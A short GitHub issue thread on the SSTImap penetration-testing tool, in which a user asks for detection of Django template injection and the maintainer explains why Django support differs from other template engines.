SSTImap icon indicating copy to clipboard operation
SSTImap copied to clipboard
verified publisher icon vladko312

Django template injection

Open sectroyer opened this issue 2 years ago • 2 comments

Looks SSTImap is not able to detect Django template injection like in PortSwigger's Server-side template injection with information disclosure via user-supplied objects Lab.

sectroyer avatar May 18 '23 16:05 sectroyer

Django template engine lacks exploitable execution capabilities, so exploiting it is different from other engines and focuses more on extracting variables. I might add support in the future.

vladko312 avatar May 20 '23 07:05 vladko312

Yes but detection would be nice that least know that "something is up" :) Also you can print an "info" that it's "worth to check" stuff like debug or secret key :) Usually that's enough to report the issue to the client

sectroyer avatar May 25 '23 15:05 sectroyer